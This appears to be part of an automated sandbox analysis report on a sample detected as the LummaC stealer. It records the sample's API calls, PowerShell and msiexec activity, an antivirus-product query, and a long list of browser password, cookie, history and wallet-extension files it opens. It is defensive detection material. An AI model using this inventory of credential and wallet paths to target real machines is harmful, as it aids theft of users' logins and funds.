Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Code function: GetLocaleInfoW,strcmp,strcmp,GetLocaleInfoW,atol,GetACP,	3_2_6BB673B4
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	3_2_6BBDF356
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Code function: GetLocaleInfoA,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,_errno,	3_2_6BB652E4
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	3_2_6BBDF2EF
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Code function: _getptd,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_itoa_s,__fassign,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,strcpy_s,__invoke_watson,	3_2_6BB67270
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Code function: GetLocaleInfoW,free,_calloc_crt,strncpy_s,GetLocaleInfoW,GetLocaleInfoW,_calloc_crt,GetLocaleInfoW,GetLastError,_calloc_crt,free,free,__invoke_watson,	3_2_6BB6767A
Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,_freea_s,malloc,	3_2_6BB6750C

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe

Code function: 3_2_00725FBB GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

3_2_00725FBB

Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe

Code function: 3_2_6BB762FC _lock,__tzname,_get_timezone,_get_daylight,_get_dstbias,___lc_codepage_func,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__timezone,__daylight,__dstbias,strcmp,free,_strlen,_malloc_crt,_strlen,strcpy_s,__invoke_watson,free,strncpy_s,atol,atol,atol,strncpy_s,__timezone,__daylight,

3_2_6BB762FC

Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe

3_2_6BB9BE38

Source: C:\Windows\SysWOW64\msiexec.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
